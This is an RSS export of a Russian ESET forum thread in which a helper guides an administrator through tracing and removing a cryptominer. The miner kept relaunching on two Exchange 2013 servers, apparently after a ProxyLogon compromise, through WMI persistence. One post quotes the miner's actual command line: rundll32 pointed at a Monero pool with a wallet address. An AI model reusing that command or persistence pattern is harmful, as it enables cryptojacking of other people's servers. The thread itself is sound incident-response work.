			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112935/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Наконец то отловил.<br />Новая версия, без ДНСов. <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=120049">IZTVMAIL01_2021-08-07_22-10-07_v4.11.8.7z</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=120050">SPHVMAIL01_2021-08-07_22-09-20_v4.11.8.7z</a><br /><i>07.08.2021 23:55:47, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112935/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112935/</guid>
			<pubDate>Sat, 07 Aug 2021 23:55:47 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112870/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			можно <noindex><a href="https://www.dropbox.com/s/w3pagxu3ys4jewr/uvs_latest.zip?dl=0" target="_blank" rel="nofollow"><B>новой версией UVS 4.11.8</B></a></noindex> включить только отслеживание процессов (только твик 39+перезагрузка)<br />и дождаться запуска майнера.<br />затем сделать образ автозапуска (с уже включенным отслеживанием)<br />(+ можно добавить новые логи autoruns и Esetlogcollector)<br /><br /><br /><br />лог DNS в новой версии вынесен отдельно.<br />4.11.8<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;o Управление DNS логом вынесено в отдельные твики, #41 и #42.<br /> &nbsp; &nbsp;DNS лог работает начиная с Win8 (в ограниченном виде) и с Win8.1 в полном.<br /> &nbsp; &nbsp;Отключение ведения лога происходит мгновенно во всех системах кроме Windows 10,<br /> &nbsp; &nbsp;в последнем случае необходимо перезагрузить систему после 42 твика.<br /> &nbsp; &nbsp;(Win7 и ниже не поддерживается).<br /><br />=============<br />если не поможет отслеживание процессов, после можно будет еще и добавить логгирование DNS <br />
			<i>04.08.2021 13:28:06, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112870/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112870/</guid>
			<pubDate>Wed, 04 Aug 2021 13:28:06 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112869/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_wkwKKf0G" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />сделайте еще лог ESETlogCollector на IZTVMAIL01, может в журналах событий что-то будет на момент запуска 30.07(надо было конечно пораньше запросить, вместе с образом автозапуска) <noindex><a href="https://forum.esetnod32.ru/forum9/topic10671/" target="_blank" rel="nofollow">https://forum.esetnod32.ru/forum9/topic10671/</a></noindex> <br />=============<br />Сделал.<br />Сегодня снова в ночь запустился майнер. Сегодня ночью\либо утром сделаю твик 39 + образ после перезагрузки от применения твика. А там будем надеяться что снова запустится майнер. Отпишусь. <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=119992">ELC_logs.zip</a><br /><i>04.08.2021 11:28:04, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112869/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112869/</guid>
			<pubDate>Wed, 04 Aug 2021 11:28:04 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112858/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Владимир, <br /><br />сделайте еще лог ESETlogCollector на IZTVMAIL01, может в журналах событий что-то будет на момент запуска 30.07<br />(надо было конечно пораньше запросить, вместе с образом автозапуска)<br /><noindex><a href="https://forum.esetnod32.ru/forum9/topic10671/" target="_blank" rel="nofollow">https://forum.esetnod32.ru/forum9/topic10671/</a></noindex><br /><br />+<br />статья о примере мониторинга событий в WMI, <br /><noindex><a href="https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html" target="_blank" rel="nofollow">https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html</a></noindex> <br />
			<i>03.08.2021 13:09:19, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112858/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112858/</guid>
			<pubDate>Tue, 03 Aug 2021 13:09:19 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112852/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Второй день, и всё нормально... напишу как проблема снова появится. Если до следующего понедельника всё будет нормально, то думаю можно закрывать инцидент. Но я в любом случае отпишусь. <br />
			<i>03.08.2021 10:22:29, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112852/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112852/</guid>
			<pubDate>Tue, 03 Aug 2021 10:22:29 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112851/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_EJ4ejYyl" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />А вообще нет какого то софта специализированно, который бы наблюдал за такими вещами?<br />=============<br />SIEM системы, мониторить логи событий, системы обнаружения вторжений и т.п.<br />логи в uVS, autoruns - это уже постфактум действия, те после того, как злоумышленники закрепились в системе. <br />
			<i>03.08.2021 09:23:57, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112851/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112851/</guid>
			<pubDate>Tue, 03 Aug 2021 09:23:57 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112850/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			да, пусто в WMI, и чисто, <br />
			<i>02.08.2021 16:32:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112850/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112850/</guid>
			<pubDate>Mon, 02 Aug 2021 16:32:17 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112849/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Пусто. &nbsp; <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=119971">IZTVMAIL01_2021-08-02_14-24-38_v4.11.7.7z</a><br /><img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=119972&" width="717" height="604" /><br /><i>02.08.2021 14:43:24, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112849/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112849/</guid>
			<pubDate>Mon, 02 Aug 2021 14:43:24 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112848/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			ясно.<br /><br />по этому серверу проверьте IZTVMAIL01<br /><br />можно через auturuns+ образ автозапуска без отслеживания процессов, проверим секцию WMI что-то там появилось вновь или нет после очистки скриптом.<br /><br />или самостоятельно проверьте<br />здесь<br />(то что здесь отмечено, было в пред образе, когда майнер запускался, и это мы все удалили скриптом)<br /><br />[FILE ID=119969]<br /><br />по логированию DNS разработчик дал пояснение:<br />regt 40 &nbsp;- отключение твика 39 (без перезагрузки) очищает и урезает лог до 1 мегабайта, при этом запись в лог продолжается.<br />regt 40 & restart - отключает твик 39 (+перезагрузка) - полностью очищает лог, и запись после перезагрузки в лог не выполнятся. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=119969&" width="970" height="278" /><br /><i>02.08.2021 13:17:25, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112848/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112848/</guid>
			<pubDate>Mon, 02 Aug 2021 13:17:25 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112847/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_bhwHw0pX" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />Владимир, еще пара вопросов:<br /><br />1. есть какая то закономерность по времени запуска процесса с майнером?<br />судя по образу на сервере <br />Имя компьютера: IZTVMAIL01<br />время запуска было:<br />03:48:12 &#91;2021.07.30&#93;<br />2. майнер запускается повторно в течение суток &nbsp;после закрытия процесса?<br />=============<br />Что я сделал, вчера сразу отключил твиком 40 анализ, т.к. обычно в ночь стартует майнер, не хотел ГБ места тратить. А так же хотел проверить сработало удаление WMI<br />Закономерности нет! И это пугает. Почти всегда в разное время, при чем не во все дни. С воскресения на понедельник уже вторая неделя не чего не запускается, но на этой недели (сегодня) так же не запустился, но возможно Ваш рецепт с WMI помог. <br />Сейчас хочу понаблюдать, если удаление WMI помогло или нет. Если нет, то Будем твиком 39 наблюдать. <br />А вообще нет какого то софта специализированно, который бы наблюдал за такими вещами? <br />
			<i>02.08.2021 11:28:22, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112847/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112847/</guid>
			<pubDate>Mon, 02 Aug 2021 11:28:22 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112838/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Владимир, еще пара вопросов:<br /><br />1. есть какая то закономерность по времени запуска процесса с майнером?<br />судя по образу на сервере <br />Имя компьютера: IZTVMAIL01<br />время запуска было:<br />03:48:12 [2021.07.30]<br />2. майнер запускается повторно в течение суток &nbsp;после закрытия процесса? <br />
			<i>01.08.2021 15:12:14, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112838/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112838/</guid>
			<pubDate>Sun, 01 Aug 2021 15:12:14 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112837/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_ahYmlQPu" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Я уже запустил твик 39 с перезагрузкой сервера с отключённым майнером. Сейчас жду запуск майнера, когда он запускается я делаю образ автозапуска. Присылаю вам, и делаю твик 40 для отключения 39 твика, и что бы ГБ лога не росли дальше. Я правильно всё понял?<br />=============<br />да , все верно,<br />главное, чтобы майнер запустился в это период, чтобы увидеть цепочки запуска<br />только для применения твика 40 (отключение отслеживания), опять же нужна перезагрузка системы <br />
			<i>01.08.2021 13:26:33, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112837/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112837/</guid>
			<pubDate>Sun, 01 Aug 2021 13:26:33 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112836/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			не увидел сразу сообщение, так как попало на 3 лист.<br /><br />1. да, нужен новый образ автозапуска после твика 39 и перезагрузки. <br /><br />конечно, желательно, чтобы процесс запуска майнера попал сразу после перезагрузки<br /><br />запись лога dns с включенным твиком 39 пойдет с момента новой загрузки системы.<br /><br />за 30-5о минут непрерывной записи (после перезагрузки) лог &nbsp;DNS займет порядка 500Мб, хорошо, если запуск майнера попадет в этот интервал,<br />тогда можно будет сделать образ автозапуска и затем отключить логгирование, чтобы файла лога не разрастался на системном диске. <br /><br />2.<br />да, смотрел, что rundll32.exe запускается от имени системы<br /><br />====quote====<br />NT AUTHORITY\СИСТЕМА<br />C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZ<WBR/>&shy;YZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON<br />=============<br /> <br />
			<i>01.08.2021 13:23:22, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112836/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112836/</guid>
			<pubDate>Sun, 01 Aug 2021 13:23:22 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112835/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_pw3ca5g4" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />возможно причина в этом:<br />ответ разработчика<br /> такое бывает когда проблемы с BITS, но оно не вешается, а минут через 5-10 выдает ошибку и продолжает работу, лечится удалением базы bits &nbsp;<br />=============<br />Разобрался, Малвербайт виновник, &nbsp;отключил и сразу запустился. Твик выполнил. Но странно на втором сервере такой же малвербайт стоит, и там дал запустится )))<br />====quote====<br /><a class="blog-p-user-name" id="bp_JEwHEL7l" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />1. если скрипты очистки выполнили, те что были выше, надо смотреть есть ли что-то сейчас в WMI или нет.2. проверить - нет ли левых учетных записей, с которых может быть удаленное подключение3. если процесс майнера запускается - проверить, под какой учетной записью запускается процесс (возможно взломщики получили пароли)4. если будет включено отслеживание событий - &nbsp;обязательно новой версией uVS 4.11.7 &nbsp; (твиком 39+перезагрузка системы)<br />=============<br />1. Мне нужно снова отправить образ?<br />====quote====<br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_IcLs8Jqe" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />надо иметь ввиду след. сообщение от разработчика:Цитата(!) Включение ведения DNS лога требует дополнительно 512mb на системном диске, этого объема хватает на 30-50 минут, &nbsp; (!) поэтому рекомендуется проводить анализ или создание образа сразу после перезагрузки. т.е. образ нужно будеn сделать сразу после перезагрузки системы. и передать его для анализа.<br />=============<br /><br /><br />=============<br />Вот это не понял... Какие мои действия? Как я понял: Сейчас на двух серверах прибит\отключен майнер. Я уже запустил твик 39 с перезагрузкой сервера с отключённым майнером. Сейчас жду запуск майнера, когда он запускается я делаю образ автозапуска. Присылаю вам, и делаю твик 40 для отключения 39 твика, и что бы ГБ лога не росли дальше. Я правильно всё понял? Или вы это написали к тому что бы я 39 твик применил ближе к ночи, ближе по времени ДО запуску майнера? <br />2.Экчендж в наружу смотрит только для получения отправки почты, мобильных приложений, вэб доступ. Проброс портов минимальный. 587, 465, 443. ЛОКАЛЬНЫХ левых учетных записей нет, те что были локальные по умолчанию им сменили пароли. ДОМЕННЫХ учеток левых пытались найти, запуская скрипт повершела, левых СОЗДАНЫХ или ИЗМЕНЕНЫХ наших вроде как нет, но тут под вопросом.<br />3. Как я помню запускался из под СИСТЕМА, авторан или диспетчер задач показал так.<br />4. &nbsp;Да, сделал АКТУАЛЬНОЙ. <br />
			<i>01.08.2021 12:57:48, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112835/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112835/</guid>
			<pubDate>Sun, 01 Aug 2021 12:57:48 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112834/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_5IUDe82K" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Странно, Не могу запустить на одном из серверов актуальную версию, при чем uVS v4.11.6 запускается... <br />=============<br />возможно причина в этом:<br />ответ разработчика<br /><B>такое бывает когда проблемы с BITS, но оно не вешается, а минут через 5-10 выдает ошибку и продолжает работу, лечится удалением базы bits </B> <br />
			<i>01.08.2021 12:15:26, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112834/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112834/</guid>
			<pubDate>Sun, 01 Aug 2021 12:15:26 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112833/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			ок.<br /><br />1. если скрипты очистки выполнили, те что были выше, надо смотреть есть ли что-то сейчас в WMI или нет.<br />2. проверить - нет ли левых учетных записей, с которых может быть удаленное подключение<br />3. если процесс майнера запускается - проверить, под какой учетной записью запускается процесс (возможно взломщики получили пароли)<br />4. если будет включено отслеживание событий - <noindex><a href="https://www.dropbox.com/s/w3pagxu3ys4jewr/uvs_latest.zip?dl=0" target="_blank" rel="nofollow">обязательно новой версией uVS 4.11.7</a></noindex> &nbsp;(твиком 39+перезагрузка системы)<br /><br />
====code====
<pre>;uVS v4.11.7 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv6.3
v400c
OFFSGNSAVE
regt 39
restart
</pre>
=============
<br /><br />надо иметь ввиду след. сообщение от разработчика:<br /><br /><br />====quote====<br />(!) Включение ведения DNS лога требует дополнительно 512mb на системном диске, этого объема хватает на 30-50 минут,<br /> &nbsp; (!) поэтому рекомендуется проводить анализ или создание образа сразу после перезагрузки. <br />=============<br /><br />т.е. образ нужно будеn сделать сразу после перезагрузки системы. и передать его для анализа.<br /><br />+ отключить отслеживание (с перезагрузкой системы), чтобы лог DNS не занимал Гб на системном диске.<br />
====code====
<pre>;uVS v4.11.7 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv6.3
v400c
OFFSGNSAVE
regt 40
restart
</pre>
============= <br />
			<i>01.08.2021 12:07:50, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112833/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112833/</guid>
			<pubDate>Sun, 01 Aug 2021 12:07:50 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112832/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_h25X73T5" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />;uVS v4.11.7 &#91;<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>&#93;<br />;Target OS: NTv6.3<br />v400c<br />OFFSGNSAVE<br />regt 39<br />restart<br />=============<br />Странно, Не могу запустить на одном из серверов актуальную версию, при чем uVS v4.11.6 запускается... При нажатии Запуск под текущим пользователем ничего после не открывается. Сделал перезагрузку, не помогло. На IZTVMAIL01 запустил твик, ждем.<br />C:\Users\All Users\Malwarebytes\MBAMService\Quarantine &nbsp;- тут пусто.<br /><br />Обязательно отпишусь! <br />
			<i>01.08.2021 12:04:23, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112832/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112832/</guid>
			<pubDate>Sun, 01 Aug 2021 12:04:23 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112831/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			На обоих серверах запускается. Но мы так же смотрим про ПроксиЛогон уязвимость, и пытаемся исправить всякими скриптами повершела и т.п. Но зараза запускается снова и снова. Иногда, очень редко, запускается на одном из двух серверов, а на втором нет. У меня вообще подозрения что команда запуска идет из вне, т.е. доступ запуска всё еще остался некий доступ. Хоть мы и поставили все обновления, заплатки от майкрософта. <br />Очень правильно что посоветовали программу для слежки, конечно же сейчас сделаю. У меня как раз был этот вопрос.<br />Скрипты сделал на двух серверах. &nbsp; <br />
			<i>01.08.2021 10:37:45, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112831/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112831/</guid>
			<pubDate>Sun, 01 Aug 2021 10:37:45 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112823/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Владимир, напишите по результату - помогло удаление заданий в WMI или нет <br />
			<i>31.07.2021 08:53:38, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112823/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112823/</guid>
			<pubDate>Sat, 31 Jul 2021 08:53:38 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
